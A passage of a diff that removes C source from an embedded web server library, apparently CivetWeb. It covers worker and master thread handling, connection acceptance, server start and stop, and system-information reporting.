-	 * produce_socket() */
-	while (consume_socket(ctx, &conn->client, conn->thread_index)) {
-		conn->conn_birth_time = time(NULL);
-
-/* Fill in IP, port info early so even if SSL setup below fails,
- * error handler would have the corresponding info.
- * Thanks to Johannes Winkelmann for the patch.
- */
-#if defined(USE_IPV6)
-		if (conn->client.rsa.sa.sa_family == AF_INET6) {
-			conn->request_info.remote_port =
-			    ntohs(conn->client.rsa.sin6.sin6_port);
-		} else
-#endif
-		{
-			conn->request_info.remote_port =
-			    ntohs(conn->client.rsa.sin.sin_port);
-		}
-
-		sockaddr_to_string(conn->request_info.remote_addr,
-		                   sizeof(conn->request_info.remote_addr),
-		                   &conn->client.rsa);
-
-		DEBUG_TRACE("Start processing connection from %s",
-		            conn->request_info.remote_addr);
-
-#if defined(MG_LEGACY_INTERFACE)
-		/* This legacy interface only works for the IPv4 case */
-		addr = ntohl(conn->client.rsa.sin.sin_addr.s_addr);
-		memcpy(&conn->request_info.remote_ip, &addr, 4);
-#endif
-
-		conn->request_info.is_ssl = conn->client.is_ssl;
-
-		if (conn->client.is_ssl) {
-#ifndef NO_SSL
-			/* HTTPS connection */
-			if (sslize(conn,
-			           conn->ctx->ssl_ctx,
-			           SSL_accept,
-			           &(conn->ctx->stop_flag))) {
-				/* Get SSL client certificate information (if set) */
-				ssl_get_client_cert_info(conn);
-
-				/* process HTTPS connection */
-				process_new_connection(conn);
-
-				/* Free client certificate info */
-				if (conn->request_info.client_cert) {
-					mg_free((void *)(conn->request_info.client_cert->subject));
-					mg_free((void *)(conn->request_info.client_cert->issuer));
-					mg_free((void *)(conn->request_info.client_cert->serial));
-					mg_free((void *)(conn->request_info.client_cert->finger));
-					conn->request_info.client_cert->subject = 0;
-					conn->request_info.client_cert->issuer = 0;
-					conn->request_info.client_cert->serial = 0;
-					conn->request_info.client_cert->finger = 0;
-					mg_free(conn->request_info.client_cert);
-					conn->request_info.client_cert = 0;
-				}
-			} else {
-        /* make sure the connection is cleaned up on SSL failure */
-        close_connection(conn);
-      }
-#endif
-    } else {
-      /* process HTTP connection */
-			process_new_connection(conn);
-		}
-
-		DEBUG_TRACE("%s", "Connection closed");
-	}
-
-
-	pthread_setspecific(sTlsKey, NULL);
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	CloseHandle(tls.pthread_cond_helper_mutex);
-#endif
-	pthread_mutex_destroy(&conn->mutex);
-
-	/* Free the request buffer. */
-	conn->buf_size = 0;
-	mg_free(conn->buf);
-	conn->buf = NULL;
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 9; /* done */
-#endif
-
-	DEBUG_TRACE("%s", "exiting");
-	return NULL;
-}
-
-
-/* Threads have different return types on Windows and Unix. */
-#ifdef _WIN32
-static unsigned __stdcall worker_thread(void *thread_func_param)
-{
-	struct worker_thread_args *pwta =
-	    (struct worker_thread_args *)thread_func_param;
-	worker_thread_run(pwta);
-	mg_free(thread_func_param);
-	return 0;
-}
-#else
-static void *
-worker_thread(void *thread_func_param)
-{
-	struct worker_thread_args *pwta =
-	    (struct worker_thread_args *)thread_func_param;
-	worker_thread_run(pwta);
-	mg_free(thread_func_param);
-	return NULL;
-}
-#endif /* _WIN32 */
-
-
-static void
-accept_new_connection(const struct socket *listener, struct mg_context *ctx)
-{
-	struct socket so;
-	char src_addr[IP_ADDR_STR_LEN];
-	socklen_t len = sizeof(so.rsa);
-	int on = 1;
-
-	if (!listener) {
-		return;
-	}
-
-	if ((so.sock = accept(listener->sock, &so.rsa.sa, &len))
-	    == INVALID_SOCKET) {
-	} else if (!check_acl(ctx, ntohl(*(uint32_t *)&so.rsa.sin.sin_addr))) {
-		sockaddr_to_string(src_addr, sizeof(src_addr), &so.rsa);
-		mg_cry(fc(ctx), "%s: %s is not allowed to connect", __func__, src_addr);
-		closesocket(so.sock);
-	} else {
-		/* Put so socket structure into the queue */
-		DEBUG_TRACE("Accepted socket %d", (int)so.sock);
-		set_close_on_exec(so.sock, fc(ctx));
-		so.is_ssl = listener->is_ssl;
-		so.ssl_redir = listener->ssl_redir;
-		if (getsockname(so.sock, &so.lsa.sa, &len) != 0) {
-			mg_cry(fc(ctx),
-			       "%s: getsockname() failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-
-		/* Set TCP keep-alive. This is needed because if HTTP-level
-		 * keep-alive
-		 * is enabled, and client resets the connection, server won't get
-		 * TCP FIN or RST and will keep the connection open forever. With
-		 * TCP keep-alive, next keep-alive handshake will figure out that
-		 * the client is down and will close the server end.
-		 * Thanks to Igor Klopov who suggested the patch. */
-		if (setsockopt(so.sock,
-		               SOL_SOCKET,
-		               SO_KEEPALIVE,
-		               (SOCK_OPT_TYPE)&on,
-		               sizeof(on)) != 0) {
-			mg_cry(fc(ctx),
-			       "%s: setsockopt(SOL_SOCKET SO_KEEPALIVE) failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-
-		/* Disable TCP Nagle's algorithm. Normally TCP packets are coalesced
-		 * to effectively fill up the underlying IP packet payload and
-		 * reduce the overhead of sending lots of small buffers. However
-		 * this hurts the server's throughput (ie. operations per second)
-		 * when HTTP 1.1 persistent connections are used and the responses
-		 * are relatively small (eg. less than 1400 bytes).
-		 */
-		if ((ctx != NULL) && (ctx->config[CONFIG_TCP_NODELAY] != NULL)
-		    && (!strcmp(ctx->config[CONFIG_TCP_NODELAY], "1"))) {
-			if (set_tcp_nodelay(so.sock, 1) != 0) {
-				mg_cry(fc(ctx),
-				       "%s: setsockopt(IPPROTO_TCP TCP_NODELAY) failed: %s",
-				       __func__,
-				       strerror(ERRNO));
-			}
-		}
-
-		/* We are using non-blocking sockets. Thus, the
-		 * set_sock_timeout(so.sock, timeout);
-		 * call is no longer required. */
-
-		/* The "non blocking" property should already be
-		 * inherited from the parent socket. Set it for
-		 * non-compliant socket implementations. */
-		set_non_blocking_mode(so.sock);
-
-		so.in_use = 0;
-		produce_socket(ctx, &so);
-	}
-}
-
-
-static void
-master_thread_run(void *thread_func_param)
-{
-	struct mg_context *ctx = (struct mg_context *)thread_func_param;
-	struct mg_workerTLS tls;
-	struct pollfd *pfd;
-	unsigned int i;
-	unsigned int workerthreadcount;
-
-	if (!ctx) {
-		return;
-	}
-
-	mg_set_thread_name("master");
-
-/* Increase priority of the master thread */
-#if defined(_WIN32)
-	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);
-#elif defined(USE_MASTER_THREAD_PRIORITY)
-	int min_prio = sched_get_priority_min(SCHED_RR);
-	int max_prio = sched_get_priority_max(SCHED_RR);
-	if ((min_prio >= 0) && (max_prio >= 0)
-	    && ((USE_MASTER_THREAD_PRIORITY) <= max_prio)
-	    && ((USE_MASTER_THREAD_PRIORITY) >= min_prio)) {
-		struct sched_param sched_param = {0};
-		sched_param.sched_priority = (USE_MASTER_THREAD_PRIORITY);
-		pthread_setschedparam(pthread_self(), SCHED_RR, &sched_param);
-	}
-#endif
-
-/* Initialize thread local storage */
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	tls.pthread_cond_helper_mutex = CreateEvent(NULL, FALSE, FALSE, NULL);
-#endif
-	tls.is_master = 1;
-	pthread_setspecific(sTlsKey, &tls);
-
-	if (ctx->callbacks.init_thread) {
-		/* Callback for the master thread (type 0) */
-		ctx->callbacks.init_thread(ctx, 0);
-	}
-
-	/* Server starts *now* */
-	ctx->start_time = time(NULL);
-
-	/* Start the server */
-	pfd = ctx->listening_socket_fds;
-	while (ctx->stop_flag == 0) {
-		for (i = 0; i < ctx->num_listening_sockets; i++) {
-			pfd[i].fd = ctx->listening_sockets[i].sock;
-			pfd[i].events = POLLIN;
-		}
-
-		if (poll(pfd, ctx->num_listening_sockets, 200) > 0) {
-			for (i = 0; i < ctx->num_listening_sockets; i++) {
-				/* NOTE(lsm): on QNX, poll() returns POLLRDNORM after the
-				 * successful poll, and POLLIN is defined as
-				 * (POLLRDNORM | POLLRDBAND)
-				 * Therefore, we're checking pfd[i].revents & POLLIN, not
-				 * pfd[i].revents == POLLIN. */
-				if ((ctx->stop_flag == 0) && (pfd[i].revents & POLLIN)) {
-					accept_new_connection(&ctx->listening_sockets[i], ctx);
-				}
-			}
-		}
-	}
-
-	/* Here stop_flag is 1 - Initiate shutdown. */
-	DEBUG_TRACE("%s", "stopping workers");
-
-	/* Stop signal received: somebody called mg_stop. Quit. */
-	close_all_listening_sockets(ctx);
-
-	/* Wakeup workers that are waiting for connections to handle. */
-	(void)pthread_mutex_lock(&ctx->thread_mutex);
-#if defined(ALTERNATIVE_QUEUE)
-	for (i = 0; i < ctx->cfg_worker_threads; i++) {
-		event_signal(ctx->client_wait_events[i]);
-
-		/* Since we know all sockets, we can shutdown the connections. */
-		if (ctx->client_socks[i].in_use) {
-			shutdown(ctx->client_socks[i].sock, SHUTDOWN_BOTH);
-		}
-	}
-#else
-	pthread_cond_broadcast(&ctx->sq_full);
-#endif
-	(void)pthread_mutex_unlock(&ctx->thread_mutex);
-
-	/* Join all worker threads to avoid leaking threads. */
-	workerthreadcount = ctx->cfg_worker_threads;
-	for (i = 0; i < workerthreadcount; i++) {
-		if (ctx->worker_threadids[i] != 0) {
-			mg_join_thread(ctx->worker_threadids[i]);
-		}
-	}
-
-#if defined(USE_LUA)
-	/* Free Lua state of lua background task */
-	if (ctx->lua_background_state) {
-		lua_State *lstate = (lua_State *)ctx->lua_background_state;
-		lua_getglobal(lstate, LUABACKGROUNDPARAMS);
-		if (lua_istable(lstate, -1)) {
-			reg_boolean(lstate, "shutdown", 1);
-			lua_pop(lstate, 1);
-			mg_sleep(2);
-		}
-		lua_close(lstate);
-		ctx->lua_background_state = 0;
-	}
-#endif
-
-	DEBUG_TRACE("%s", "exiting");
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	CloseHandle(tls.pthread_cond_helper_mutex);
-#endif
-	pthread_setspecific(sTlsKey, NULL);
-
-	/* Signal mg_stop() that we're done.
-	 * WARNING: This must be the very last thing this
-	 * thread does, as ctx becomes invalid after this line. */
-	ctx->stop_flag = 2;
-}
-
-
-/* Threads have different return types on Windows and Unix. */
-#ifdef _WIN32
-static unsigned __stdcall master_thread(void *thread_func_param)
-{
-	master_thread_run(thread_func_param);
-	return 0;
-}
-#else
-static void *
-master_thread(void *thread_func_param)
-{
-	master_thread_run(thread_func_param);
-	return NULL;
-}
-#endif /* _WIN32 */
-
-
-static void
-free_context(struct mg_context *ctx)
-{
-	int i;
-	struct mg_handler_info *tmp_rh;
-
-	if (ctx == NULL) {
-		return;
-	}
-
-	if (ctx->callbacks.exit_context) {
-		ctx->callbacks.exit_context(ctx);
-	}
-
-	/* All threads exited, no sync is needed. Destroy thread mutex and
-	 * condvars
-	 */
-	(void)pthread_mutex_destroy(&ctx->thread_mutex);
-#if defined(ALTERNATIVE_QUEUE)
-	mg_free(ctx->client_socks);
-	for (i = 0; (unsigned)i < ctx->cfg_worker_threads; i++) {
-		event_destroy(ctx->client_wait_events[i]);
-	}
-	mg_free(ctx->client_wait_events);
-#else
-	(void)pthread_cond_destroy(&ctx->sq_empty);
-	(void)pthread_cond_destroy(&ctx->sq_full);
-#endif
-
-	/* Destroy other context global data structures mutex */
-	(void)pthread_mutex_destroy(&ctx->nonce_mutex);
-
-#if defined(USE_TIMERS)
-	timers_exit(ctx);
-#endif
-
-	/* Deallocate config parameters */
-	for (i = 0; i < NUM_OPTIONS; i++) {
-		if (ctx->config[i] != NULL) {
-#if defined(_MSC_VER)
-#pragma warning(suppress : 6001)
-#endif
-			mg_free(ctx->config[i]);
-		}
-	}
-
-	/* Deallocate request handlers */
-	while (ctx->handlers) {
-		tmp_rh = ctx->handlers;
-		ctx->handlers = tmp_rh->next;
-		mg_free(tmp_rh->uri);
-		mg_free(tmp_rh);
-	}
-
-#ifndef NO_SSL
-	/* Deallocate SSL context */
-	if (ctx->ssl_ctx != NULL) {
-		SSL_CTX_free(ctx->ssl_ctx);
-	}
-#endif /* !NO_SSL */
-
-	/* Deallocate worker thread ID array */
-	if (ctx->worker_threadids != NULL) {
-		mg_free(ctx->worker_threadids);
-	}
-
-	/* Deallocate worker thread ID array */
-	if (ctx->worker_connections != NULL) {
-		mg_free(ctx->worker_connections);
-	}
-
-	/* deallocate system name string */
-	mg_free(ctx->systemName);
-
-	/* Deallocate context itself */
-	mg_free(ctx);
-}
-
-
-void
-mg_stop(struct mg_context *ctx)
-{
-	pthread_t mt;
-	if (!ctx) {
-		return;
-	}
-
-	/* We don't use a lock here. Calling mg_stop with the same ctx from
-	 * two threads is not allowed. */
-	mt = ctx->masterthreadid;
-	if (mt == 0) {
-		return;
-	}
-
-	ctx->masterthreadid = 0;
-
-	/* Set stop flag, so all threads know they have to exit. */
-	ctx->stop_flag = 1;
-
-	/* Wait until everything has stopped. */
-	while (ctx->stop_flag != 2) {
-		(void)mg_sleep(10);
-	}
-
-	mg_join_thread(mt);
-	free_context(ctx);
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	(void)WSACleanup();
-#endif /* _WIN32 && !__SYMBIAN32__ */
-}
-
-
-static void
-get_system_name(char **sysName)
-{
-#if defined(_WIN32)
-#if !defined(__SYMBIAN32__)
-#if defined(_WIN32_WCE)
-	*sysName = mg_strdup("WinCE");
-#else
-	char name[128];
-	DWORD dwVersion = 0;
-	DWORD dwMajorVersion = 0;
-	DWORD dwMinorVersion = 0;
-	DWORD dwBuild = 0;
-	BOOL wowRet, isWoW = FALSE;
-
-#ifdef _MSC_VER
-#pragma warning(push)
-/* GetVersion was declared deprecated */
-#pragma warning(disable : 4996)
-#endif
-	dwVersion = GetVersion();
-#ifdef _MSC_VER
-#pragma warning(pop)
-#endif
-
-	dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
-	dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
-	dwBuild = ((dwVersion < 0x80000000) ? (DWORD)(HIWORD(dwVersion)) : 0);
-	(void)dwBuild;
-
-	wowRet = IsWow64Process(GetCurrentProcess(), &isWoW);
-
-	sprintf(name,
-	        "Windows %u.%u%s",
-	        (unsigned)dwMajorVersion,
-	        (unsigned)dwMinorVersion,
-	        (wowRet ? (isWoW ? " (WoW64)" : "") : " (?)"));
-
-	*sysName = mg_strdup(name);
-#endif
-#else
-	*sysName = mg_strdup("Symbian");
-#endif
-#else
-	struct utsname name;
-	memset(&name, 0, sizeof(name));
-	uname(&name);
-	*sysName = mg_strdup(name.sysname);
-#endif
-}
-
-
-struct mg_context *
-mg_start(const struct mg_callbacks *callbacks,
-         void *user_data,
-         const char **options)
-{
-	struct mg_context *ctx;
-	const char *name, *value, *default_value;
-	int idx, ok, workerthreadcount;
-	unsigned int i;
-	int itmp;
-	void (*exit_callback)(const struct mg_context *ctx) = 0;
-
-	struct mg_workerTLS tls;
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	WSADATA data;
-	WSAStartup(MAKEWORD(2, 2), &data);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-
-	/* Allocate context and initialize reasonable general case defaults. */
-	if ((ctx = (struct mg_context *)mg_calloc(1, sizeof(*ctx))) == NULL) {
-		return NULL;
-	}
-
-	/* Random number generator will initialize at the first call */
-	ctx->auth_nonce_mask =
-	    (uint64_t)get_random() ^ (uint64_t)(ptrdiff_t)(options);
-
-	if (mg_init_library_called == 0) {
-		/* Legacy INIT, if mg_start is called without mg_init_library.
-		 * Note: This may cause a memory leak */
-		mg_init_library(0);
-	}
-
-	tls.is_master = -1;
-	tls.thread_idx = (unsigned)mg_atomic_inc(&thread_idx_max);
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	tls.pthread_cond_helper_mutex = NULL;
-#endif
-	pthread_setspecific(sTlsKey, &tls);
-
-	ok = 0 == pthread_mutex_init(&ctx->thread_mutex, &pthread_mutex_attr);
-#if !defined(ALTERNATIVE_QUEUE)
-	ok &= 0 == pthread_cond_init(&ctx->sq_empty, NULL);
-	ok &= 0 == pthread_cond_init(&ctx->sq_full, NULL);
-#endif
-	ok &= 0 == pthread_mutex_init(&ctx->nonce_mutex, &pthread_mutex_attr);
-	if (!ok) {
-		/* Fatal error - abort start. However, this situation should never
-		 * occur in practice. */
-		mg_cry(fc(ctx), "Cannot initialize thread synchronization objects");
-		mg_free(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	if (callbacks) {
-		ctx->callbacks = *callbacks;
-		exit_callback = callbacks->exit_context;
-		ctx->callbacks.exit_context = 0;
-	}
-	ctx->user_data = user_data;
-	ctx->handlers = NULL;
-
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	ctx->shared_lua_websockets = 0;
-#endif
-
-	while (options && (name = *options++) != NULL) {
-		if ((idx = get_option_index(name)) == -1) {
-			mg_cry(fc(ctx), "Invalid option: %s", name);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		} else if ((value = *options++) == NULL) {
-			mg_cry(fc(ctx), "%s: option value cannot be NULL", name);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		}
-		if (ctx->config[idx] != NULL) {
-			mg_cry(fc(ctx), "warning: %s: duplicate option", name);
-			mg_free(ctx->config[idx]);
-		}
-		ctx->config[idx] = mg_strdup(value);
-		DEBUG_TRACE("[%s] -> [%s]", name, value);
-	}
-
-	/* Set default value if needed */
-	for (i = 0; config_options[i].name != NULL; i++) {
-		default_value = config_options[i].default_value;
-		if ((ctx->config[i] == NULL) && (default_value != NULL)) {
-			ctx->config[i] = mg_strdup(default_value);
-		}
-	}
-
-	itmp = atoi(ctx->config[MAX_REQUEST_SIZE]);
-
-	if (itmp < 1024) {
-		mg_cry(fc(ctx), "max_request_size too small");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-	ctx->max_request_size = (unsigned)itmp;
-
-	workerthreadcount = atoi(ctx->config[NUM_THREADS]);
-
-	if (workerthreadcount > MAX_WORKER_THREADS) {
-		mg_cry(fc(ctx), "Too many worker threads");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	if (workerthreadcount <= 0) {
-		mg_cry(fc(ctx), "Invalid number of worker threads");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-#if defined(NO_FILES)
-	if (ctx->config[DOCUMENT_ROOT] != NULL) {
-		mg_cry(fc(ctx), "%s", "Document root must not be set");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-#endif
-
-	get_system_name(&ctx->systemName);
-
-#if defined(USE_LUA)
-	/* If a Lua background script has been configured, start it. */
-	if (ctx->config[LUA_BACKGROUND_SCRIPT] != NULL) {
-		char ebuf[256];
-		lua_State *state = (void *)mg_prepare_lua_context_script(
-		    ctx->config[LUA_BACKGROUND_SCRIPT], ctx, ebuf, sizeof(ebuf));
-		if (!state) {
-			mg_cry(fc(ctx), "lua_background_script error: %s", ebuf);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		}
-		ctx->lua_background_state = (void *)state;
-
-		lua_newtable(state);
-		reg_boolean(state, "shutdown", 0);
-
-		struct vec opt_vec;
-		struct vec eq_vec;
-		const char *sparams = ctx->config[LUA_BACKGROUND_SCRIPT_PARAMS];
-
-		while ((sparams = next_option(sparams, &opt_vec, &eq_vec)) != NULL) {
-			reg_llstring(
-			    state, opt_vec.ptr, opt_vec.len, eq_vec.ptr, eq_vec.len);
-			if (mg_strncasecmp(sparams, opt_vec.ptr, opt_vec.len) == 0)
-				break;
-		}
-		lua_setglobal(state, LUABACKGROUNDPARAMS);
-
-	} else {
-		ctx->lua_background_state = 0;
-	}
-#endif
-
-	/* NOTE(lsm): order is important here. SSL certificates must
-	 * be initialized before listening ports. UID must be set last. */
-	if (!set_gpass_option(ctx) ||
-#if !defined(NO_SSL)
-	    !set_ssl_option(ctx) ||
-#endif
-	    !set_ports_option(ctx) ||
-#if !defined(_WIN32)
-	    !set_uid_option(ctx) ||
-#endif
-	    !set_acl_option(ctx)) {
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-#if !defined(_WIN32) && !defined(__SYMBIAN32__)
-	/* Ignore SIGPIPE signal, so if browser cancels the request, it
-	 * won't kill the whole process. */
-	(void)signal(SIGPIPE, SIG_IGN);
-#endif /* !_WIN32 && !__SYMBIAN32__ */
-
-	ctx->cfg_worker_threads = ((unsigned int)(workerthreadcount));
-	ctx->worker_threadids = (pthread_t *)mg_calloc_ctx(ctx->cfg_worker_threads,
-	                                                   sizeof(pthread_t),
-	                                                   ctx);
-	if (ctx->worker_threadids == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker thread ID array");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-	ctx->worker_connections =
-	    (struct mg_connection *)mg_calloc_ctx(ctx->cfg_worker_threads,
-	                                          sizeof(struct mg_connection),
-	                                          ctx);
-	if (ctx->worker_connections == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker thread connection array");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-
-#if defined(ALTERNATIVE_QUEUE)
-	ctx->client_wait_events =
-	    (void **)mg_calloc_ctx(sizeof(ctx->client_wait_events[0]),
-	                           ctx->cfg_worker_threads,
-	                           ctx);
-	if (ctx->client_wait_events == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker event array");
-		mg_free(ctx->worker_threadids);
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	ctx->client_socks =
-	    (struct socket *)mg_calloc_ctx(sizeof(ctx->client_socks[0]),
-	                                   ctx->cfg_worker_threads,
-	                                   ctx);
-	if (ctx->client_wait_events == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker socket array");
-		mg_free(ctx->client_socks);
-		mg_free(ctx->worker_threadids);
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	for (i = 0; (unsigned)i < ctx->cfg_worker_threads; i++) {
-		ctx->client_wait_events[i] = event_create();
-		if (ctx->client_wait_events[i] == 0) {
-			mg_cry(fc(ctx), "Error creating worker event %i", i);
-			while (i > 0) {
-				i--;
-				event_destroy(ctx->client_wait_events[i]);
-			}
-			mg_free(ctx->client_socks);
-			mg_free(ctx->worker_threadids);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		}
-	}
-#endif
-
-
-#if defined(USE_TIMERS)
-	if (timers_init(ctx) != 0) {
-		mg_cry(fc(ctx), "Error creating timers");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-#endif
-
-	/* Context has been created - init user libraries */
-	if (ctx->callbacks.init_context) {
-		ctx->callbacks.init_context(ctx);
-	}
-	ctx->callbacks.exit_context = exit_callback;
-	ctx->context_type = CONTEXT_SERVER; /* server context */
-
-	/* Start master (listening) thread */
-	mg_start_thread_with_id(master_thread, ctx, &ctx->masterthreadid);
-
-	/* Start worker threads */
-	for (i = 0; i < ctx->cfg_worker_threads; i++) {
-		struct worker_thread_args *wta = (struct worker_thread_args *)
-		    mg_malloc_ctx(sizeof(struct worker_thread_args), ctx);
-		if (wta) {
-			wta->ctx = ctx;
-			wta->index = (int)i;
-		}
-
-		if ((wta == NULL)
-		    || (mg_start_thread_with_id(worker_thread,
-		                                wta,
-		                                &ctx->worker_threadids[i]) != 0)) {
-
-			/* thread was not created */
-			if (wta != NULL) {
-				mg_free(wta);
-			}
-
-			if (i > 0) {
-				mg_cry(fc(ctx),
-				       "Cannot start worker thread %i: error %ld",
-				       i + 1,
-				       (long)ERRNO);
-			} else {
-				mg_cry(fc(ctx),
-				       "Cannot create threads: error %ld",
-				       (long)ERRNO);
-				free_context(ctx);
-				pthread_setspecific(sTlsKey, NULL);
-				return NULL;
-			}
-			break;
-		}
-	}
-
-	pthread_setspecific(sTlsKey, NULL);
-	return ctx;
-}
-
-
-/* Feature check API function */
-unsigned
-mg_check_feature(unsigned feature)
-{
-	static const unsigned feature_set = 0
-/* Set bits for available features according to API documentation.
- * This bit mask is created at compile time, according to the active
- * preprocessor defines. It is a single const value at runtime. */
-#if !defined(NO_FILES)
-	                                    | 0x0001u
-#endif
-#if !defined(NO_SSL)
-	                                    | 0x0002u
-#endif
-#if !defined(NO_CGI)
-	                                    | 0x0004u
-#endif
-#if defined(USE_IPV6)
-	                                    | 0x0008u
-#endif
-#if defined(USE_WEBSOCKET)
-	                                    | 0x0010u
-#endif
-#if defined(USE_LUA)
-	                                    | 0x0020u
-#endif
-#if defined(USE_DUKTAPE)
-	                                    | 0x0040u
-#endif
-#if !defined(NO_CACHING)
-	                                    | 0x0080u
-#endif
-#if defined(USE_SERVER_STATS)
-	                                    | 0x0100u
-#endif
-
-/* Set some extra bits not defined in the API documentation.
- * These bits may change without further notice. */
-#if defined(MG_LEGACY_INTERFACE)
-	                                    | 0x8000u
-#endif
-#if defined(MEMORY_DEBUGGING)
-	                                    | 0x0100u
-#endif
-#if defined(USE_TIMERS)
-	                                    | 0x0200u
-#endif
-#if !defined(NO_NONCE_CHECK)
-	                                    | 0x0400u
-#endif
-#if !defined(NO_POPEN)
-	                                    | 0x0800u
-#endif
-	    ;
-	return (feature & feature_set);
-}
-
-
-/* strcat with additional NULL check to avoid clang scan-build warning. */
-#define strcat0(a, b)                                                          \
-	{                                                                          \
-		if ((a != NULL) && (b != NULL)) {                                      \
-			strcat(a, b);                                                      \
-		}                                                                      \
-	}
-
-
-/* Get system information. It can be printed or stored by the caller.
- * Return the size of available information. */
-static int
-mg_get_system_info_impl(char *buffer, int buflen)
-{
-	char block[256];
-	int system_info_length = 0;
-
-#if defined(_WIN32)
-	const char *eol = "\r\n";
-#else
-	const char *eol = "\n";
-#endif
-
-	const char *eoobj = "}";
-	int reserved_len = (int)strlen(eoobj) + (int)strlen(eol);
-
-	if ((buffer == NULL) || (buflen < 1)) {
-		buflen = 0;
-	} else {
-		*buffer = 0;
-	}
-
-	mg_snprintf(NULL, NULL, block, sizeof(block), "{%s", eol);
-	system_info_length += (int)strlen(block);
-	if (system_info_length < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Server version */
-	{
-		const char *version = mg_version();
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"version\" : \"%s\",%s",
-		            version,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* System info */
-	{
-#if defined(_WIN32)
-#if !defined(__SYMBIAN32__)
-		DWORD dwVersion = 0;
-		DWORD dwMajorVersion = 0;
-		DWORD dwMinorVersion = 0;
-		SYSTEM_INFO si;
-
-		GetSystemInfo(&si);
-
-#ifdef _MSC_VER
-#pragma warning(push)
-/* GetVersion was declared deprecated */
-#pragma warning(disable : 4996)
-#endif
-		dwVersion = GetVersion();
-#ifdef _MSC_VER
-#pragma warning(pop)
-#endif
-
-		dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
-		dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"os\" : \"Windows %u.%u\",%s",
-		            (unsigned)dwMajorVersion,
-		            (unsigned)dwMinorVersion,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"cpu\" : \"type %u, cores %u, mask %x\",%s",
-		            (unsigned)si.wProcessorArchitecture,
-		            (unsigned)si.dwNumberOfProcessors,
-		            (unsigned)si.dwActiveProcessorMask,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-
-#else
-		mg_snprintf(NULL, NULL, block, sizeof(block), "%s - Symbian%s", eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-#else
-		struct utsname name;
-		memset(&name, 0, sizeof(name));
-		uname(&name);
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"os\" : \"%s %s (%s) - %s\",%s",
-		            name.sysname,
-		            name.version,
-		            name.release,
-		            name.machine,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-	}
-
-	/* Features */
-	{
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"features\" : %lu,%s"
-		            "\"feature_list\" : \"Server:%s%s%s%s%s%s%s%s%s\",%s",
-		            (unsigned long)mg_check_feature(0xFFFFFFFFu),
-		            eol,
-		            mg_check_feature(1) ? " Files" : "",
-		            mg_check_feature(2) ? " HTTPS" : "",
-		            mg_check_feature(4) ? " CGI" : "",
-		            mg_check_feature(8) ? " IPv6" : "",
-		            mg_check_feature(16) ? " WebSockets" : "",
-		            mg_check_feature(32) ? " Lua" : "",
-		            mg_check_feature(64) ? " JavaScript" : "",
-		            mg_check_feature(128) ? " Cache" : "",
-		            mg_check_feature(256) ? " Stats" : "",
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-
-#ifdef USE_LUA
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"lua_version\" : \"%u (%s)\",%s",
-		            (unsigned)LUA_VERSION_NUM,
